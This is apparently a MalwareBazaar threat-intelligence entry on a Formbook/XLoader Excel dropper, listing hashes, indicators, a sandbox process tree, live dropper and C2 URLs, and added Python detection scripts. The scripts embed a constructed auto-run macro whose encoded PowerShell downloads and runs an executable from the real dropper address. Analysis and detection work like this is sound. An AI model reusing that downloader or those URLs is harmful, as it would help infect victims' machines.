MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Formbook


Vendor detections: 9


Maldoc score: 11



SHA256 hash: 67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c
SHA3-384 hash: fd6651f6f866e7cf9bc41840fcdcdff3fa128c9372de19a67738fe13133321bd7bdd50c9cd2f2cc6f3b0c05b95600b7c
SHA1 hash: 5f1a4160d8c1a5aad5e9ed1f0eac0eecaa1f7a99
MD5 hash: bbb27746203855d42f677ce130686e7c
humanhash: illinois-avocado-speaker-johnny
File name: 2021catalog-selected products.xlsm
Signature: Formbook
File size: 10'006 bytes
First seen: 2021-10-09 06:29:24 UTC
Last seen: Never
File type: Excel file xlsm
MIME type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep: 192:s65vv5mn572/pIXFONh4Bb3dZxEZgt5OxLJlsbATBaFqJ+J1M:suvv5m8/6FY4tZxEZgvODla+Mu
TLSH: T160228E1FDAC6C87DCACB98BB029B2A779C0C6542A5C8B5423EA412797151D8403FF5AF
Reporter: abuse_ch
Tags: FormBook xlsm


abuse_ch
Formbook payload URL:
http://13.92.100.208/toks/audio.exe

Office OLE Information


This malware sample appears to be an Office document. The following tables provide more information about this document, obtained with oletools and oledump.

OLE id
Maldoc score: 11
OLE dump

MalwareBazaar was able to identify 8 sections in this file using oledump (the seven listed below are the VBA project streams):

Section ID   Section size   Section name
A1           535 bytes      PROJECT
A2           92 bytes       PROJECTwm
A3           169 bytes      VBA/Table 1
A4           1059 bytes     VBA/ThisWorkbook
A5           171 bytes      VBA/Workbook
A6           7 bytes        VBA/_VBA_PROJECT
A7           234 bytes      VBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate the VBA script(s) embedded in this file's OLE objects using olevba; the following indicators were found:

Type        Keyword               Description
AutoExec    Workbook_Activate     Runs when the Excel Workbook is opened
IOC         ershell.exe           Executable file name
IOC         Brznatqyjaodlncwtvec  Executable file name
Suspicious  Open                  May open a file
Suspicious  Output                May write to a file (if combined with Open)
Suspicious  Shell                 May run an executable file or a system command
Suspicious  Hex Strings           Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
Suspicious  Base64 Strings        Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
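The olevba indicators above (an AutoExec hook, Shell, Open/Output, hex and base64 strings, plus the vendor findings further down about a hidden-window PowerShell pivot and a URL that uses a bare IPv4 address) are exactly what an analyst checks by hand when triaging a maldoc. The script below is an added example written for this page; it is not MalwareBazaar or oletools code. It runs those checks over the source text of one VBA module and decodes any base64 it finds, treating UTF-16LE blobs as PowerShell -EncodedCommand payloads. SAMPLE_VBA is constructed to exercise the checks and is not this sample's real macro; the PowerShell command it embeds is likewise an assumption, built around the dropper URL reported on this page. A real .xlsm keeps its macro in xl/vbaProject.bin in MS-OVBA compressed form, so decompress it (olevba does this) before calling triage_vba().

```python
"""Added example (not MalwareBazaar or oletools code): static triage of one
VBA module's source text for the indicator classes olevba reported on this
sample. SAMPLE_VBA is CONSTRUCTED; the sample's real macro is not on the page."""
import base64
import re

AUTOEXEC_HOOKS = ("Workbook_Open", "Workbook_Activate", "Auto_Open",
                  "Document_Open", "AutoOpen", "AutoExec")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
IPV4_URL_RE = re.compile(r"^https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|$)", re.I)
FILENAME_RE = re.compile(r"\b[\w-]+\.(?:exe|bat|cmd|ps1|vbs|js|dll)\b", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
HEX_RE = re.compile(r"\b(?:[0-9A-Fa-f]{2}){8,}\b")
HIDDEN_PS_RE = re.compile(r"powershell[^\r\n]*-w(?:indowstyle)?\s+hidden", re.I)


def encode_powershell_b64(cmd: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell_b64(blob: str):
    """Decode a base64 blob; an ASCII command in UTF-16LE has every odd byte 0x00."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:
        return None
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def triage_vba(source: str) -> dict:
    """Return olevba-style findings for one macro module's source text."""
    decoded = [t for t in (decode_powershell_b64(m.group(0)) for m in B64_RE.finditer(source)) if t]
    # Search the macro text plus everything that could be decoded out of it.
    corpus = "\n".join([source, *decoded])
    urls = sorted(set(URL_RE.findall(corpus)))
    suspicious = []
    if re.search(r"\bShell\b", source):
        suspicious.append("Shell")
    if re.search(r"\bOpen\b", source) and re.search(r"\bOutput\b", source):
        suspicious.append("Open/Output")
    if B64_RE.search(source):
        suspicious.append("Base64 Strings")
    if HEX_RE.search(B64_RE.sub(" ", source)):  # hex runs outside base64 blobs
        suspicious.append("Hex Strings")
    return {
        "autoexec": [h for h in AUTOEXEC_HOOKS if re.search(r"\b%s\b" % h, source)],
        "suspicious": suspicious,
        "iocs": sorted(set(FILENAME_RE.findall(corpus))),
        "urls": urls,
        "ip_urls": [u for u in urls if IPV4_URL_RE.match(u)],  # dotted-quad URL
        "decoded": decoded,
        "hidden_powershell": bool(HIDDEN_PS_RE.search(corpus)),
    }


# CONSTRUCTED stand-in for a downloader: the URL is the dropper URL from this
# page, the command itself is an assumption.
DROPPER_URL = "http://13.92.100.208/toks/audio.exe"
DROPPER_CMD = (
    "$u='" + DROPPER_URL + "';"
    "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\audio.exe');"
    "Start-Process ($env:TEMP+'\\audio.exe')"
)
SAMPLE_VBA = """Private Sub Workbook_Activate()
    Dim p As String
    p = Environ("TEMP") & "\\Brznatqyjaodlncwtvecpod.bat"
    Open p For Output As #1
    Print #1, "powershell -windowstyle hidden -enc %s"
    Close #1
    Shell p, vbHide
End Sub
""" % encode_powershell_b64(DROPPER_CMD)

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print("%-18s %s" % (key + ":", value))
```

The decoder deliberately keys on the zero high bytes of UTF-16LE rather than trying a decode and hoping: an even-length UTF-8 blob decodes "successfully" as UTF-16LE into printable CJK garbage, so a try/except heuristic would misclassify it.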

Intelligence


File Origin
# of uploads: 1
# of downloads: 349
Origin country: n/a
Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 60%
Tags: cmd macros macros-on-open
Result
Verdict: MALICIOUS
Details
Base64 Encoded Powershell Directives
Detected one or more base64 encoded Powershell directives.
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
IPv4 Dotted Quad URL
A URL was detected referencing a direct IP address, as opposed to a domain name.
Hidden Powershell
Detected a pivot to Powershell that utilizes commonly nefarious attributes such as '-windowstyle hidden'.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Document With Minimal Content
Document contains less than 1 kilobyte of semantic information.
Result
Threat name: FormBook
Detection: malicious
Classification: bank.troj.expl.evad
Score: 100 / 100
Signature
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document exploit detected (creates forbidden files)
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found malware configuration
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Encoded PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Yara detected FormBook
Behaviour
Behavior Graph:
Behavior Graph ID: 499800
Sample: 2021catalog-selected produc...
Start date: 09/10/2021
Architecture: WINDOWS
Score: 100
Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

Process tree (dropped files, network contacts and signatures listed under the process they belong to):
EXCEL.EXE (started)
    dropped: C:\Users\user\...\Brznatqyjaodlncwtvecpod.bat (ASCII)
    dropped: C:\...\~$2021catalog-selected products.xlsm (data)
    dropped: 2021catalog-select...ducts.xlsm.. (copy) (data)
    signature: Document exploit detected (creates forbidden files)
    -> cmd.exe (started)
        signatures: Malicious encrypted Powershell command line found; Encrypted powershell cmdline option found
        -> powershell.exe (started)
            network: 13.92.100.208, ports 49167, 80, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
            dropped: C:\Users\user\AppData\...\Ywcnejjifkinunu.exe (PE32)
            signature: Powershell drops PE file
            -> Ywcnejjifkinunu.exe (started)
                network: cdn.discordapp.com 162.159.129.233, ports 443, 49168, 49169, CLOUDFLARENETUS, United States
                signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; 3 other signatures
                -> Ywcnejjifkinunu.exe (started, second instance)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                    -> explorer.exe (injected)
                        -> msiexec.exe (started)
                            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                            -> cmd.exe (started)
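The behaviour graph above is the chain a defender has to catch before the hollowing stage: an Office process starts cmd.exe, cmd.exe starts powershell.exe with an encoded and hidden-window command line, and PowerShell writes a PE to disk and runs it. The code below is an added example, not MalwareBazaar's or the sandbox vendor's: it implements the two Sigma-style checks named in the signature list ("Microsoft Office Product Spawning Windows Shell" and "Suspicious Encoded PowerShell Command Line"), the "Powershell drops PE file" check, and a lineage check that walks the parent chain, because here cmd.exe sits between Excel and PowerShell and a direct-parent rule on powershell.exe alone would not see the Office origin. The EVENTS list is constructed to mirror the graph; the pids, full paths, command lines and event layout are assumptions.

```python
"""Added example (not MalwareBazaar's or a sandbox vendor's code): Sigma-style
process-lineage detections run over CONSTRUCTED process/file events modelled
on this sample's behaviour graph. Pids, paths and command lines are assumed."""
import base64
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 run.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)


def image_name(path: str) -> str:
    """Case-folded file name of an image path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev, procs):
    """Walk a process event's parent chain through the pid -> event map."""
    seen, pid = set(), ev["ppid"]
    while pid in procs and pid not in seen:
        seen.add(pid)
        yield procs[pid]
        pid = procs[pid]["ppid"]


def evaluate(events):
    """Return (rule, pid) alerts for a list of process and file events."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for ev in events:
        name = image_name(ev["image"])
        if ev["type"] == "process":
            parent = procs.get(ev["ppid"])
            # Sigma: Microsoft Office Product Spawning Windows Shell
            if parent and image_name(parent["image"]) in OFFICE_IMAGES and name in SHELL_IMAGES:
                alerts.append(("office_spawning_shell", ev["pid"]))
            # Sigma: Suspicious Encoded PowerShell Command Line
            if name in PS_IMAGES and ENCODED_FLAG_RE.search(ev["cmdline"]):
                alerts.append(("encoded_powershell", ev["pid"]))
                # Lineage: any Office ancestor, not only the direct parent.
                if any(image_name(a["image"]) in OFFICE_IMAGES for a in ancestors(ev, procs)):
                    alerts.append(("office_lineage_encoded_powershell", ev["pid"]))
        elif ev["type"] == "file":
            # "Powershell drops PE file": judge by the MZ header, not the extension.
            if name in PS_IMAGES and ev["header"].startswith(b"MZ"):
                alerts.append(("powershell_drops_pe", ev["pid"]))
    return alerts


# CONSTRUCTED telemetry modelled on the behaviour graph (assumed pids/paths).
EXCEL = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
CMD = "C:\\Windows\\System32\\cmd.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
BAT = "C:\\Users\\user\\AppData\\Local\\Temp\\Brznatqyjaodlncwtvecpod.bat"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\Ywcnejjifkinunu.exe"
ENC = base64.b64encode("$u='http://13.92.100.208/toks/audio.exe'".encode("utf-16-le")).decode()
EVENTS = [
    {"type": "process", "pid": 600, "ppid": 500, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 700, "ppid": 600, "image": CMD, "cmdline": "cmd.exe"},  # user-opened shell, benign
    {"type": "process", "pid": 1200, "ppid": 600, "image": EXCEL,
     "cmdline": '"EXCEL.EXE" "C:\\Users\\user\\Desktop\\2021catalog-selected products.xlsm"'},
    {"type": "file", "pid": 1200, "image": EXCEL, "path": BAT, "header": b"powe"},
    {"type": "process", "pid": 1304, "ppid": 1200, "image": CMD, "cmdline": 'cmd /c "%s"' % BAT},
    {"type": "process", "pid": 1388, "ppid": 1304, "image": PS,
     "cmdline": "powershell -windowstyle hidden -enc " + ENC},
    {"type": "file", "pid": 1388, "image": PS, "path": DROPPED, "header": b"MZ\x90\x00"},
    {"type": "process", "pid": 1452, "ppid": 1388, "image": DROPPED, "cmdline": DROPPED},
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print("%-36s pid=%d" % (rule, pid))
```

The benign explorer.exe -> cmd.exe chain (pid 700) produces no alert, while the Excel-rooted chain fires all four rules; on a real EDR feed the same logic runs over Sysmon event ID 1 (process creation) and ID 11 (file creation) records.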
Threat name: Script-Macro.Downloader.Heuristic
Status: Malicious
First seen: 2021-10-08 18:00:21 UTC
AV detection: 8 of 28 (28.57%)
Threat level: 2/5
Result
Malware family: xloader
Score: 10/10
Tags: family:xloader campaign:mexq loader macro rat suricata
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious behavior: RenamesItself
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Program crash
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Deletes itself
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Xloader Payload
Process spawned unexpected child process
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Malware Config
C2 Extraction: http://www.aliexpress-br.com/mexq/
Dropper Extraction: http://13.92.100.208/toks/audio.exe
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments